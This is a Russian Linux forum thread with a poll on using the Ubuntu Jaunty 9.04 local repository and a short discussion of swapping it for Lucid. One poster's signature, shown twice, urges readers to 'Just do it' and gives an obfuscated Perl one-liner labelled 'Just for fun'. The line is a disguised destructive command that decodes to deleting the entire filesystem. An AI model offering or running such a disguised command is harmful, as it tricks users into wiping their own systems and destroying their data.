Пользуетесь ли Jaunty 9.04

Репозиторий дистрибутива Ubuntu

ДА
3
23%
НЕТ
10
77%

Всего голосов : 13

Сообщение tensor » 13 май 2010 21:58

--Да
--Нет
--Задумалсо....
Админы помогите привести сабж к адекватному кондишену - с опросом и рюшечками.
Изображение
Just do it perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Just for fun :)
Ось должна быть в кайф!
tensor

Re: Пользуетесь ли Jaunty 9.04

Сообщение bizlex » 18 май 2010 10:25

Да
bizlex

Re: Пользуетесь ли Jaunty 9.04

Сообщение tensor » 18 май 2010 21:06

Или может как-то переформулировать опрос в стиле "какой репозиторий заменим на реп для Lucid"??? Так даже пожалуй было бы справедливее. У меня например Арч, но я чаще пользуюсь инетовским репом яндекса, хотя для первичной установки локальный реп - незаменим. Поэтому вполне согласился бы и с мнением большинства, если бы реп моей оси удаляли. Кроме того чего уж тут скромничать - почти у всех нас есть толстый анлим (я например свой даже иногда не успеваю израсходовать). А вот новичкам (и не только) убунтовцам место в локалке действительно нужно, потому что у них запросы меньше и анлима нету. Сам таким был. Кроме того мне кажется это способствовало бы популяризации линуха. И пусть я сам "красноглазик", но все же считаю, что привлечение новых людей на данном этапе развития важнее сохранения олдскульных традиций.
Изображение
Just do it perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Just for fun :)
Ось должна быть в кайф!
tensor

Вернуться в Ubuntu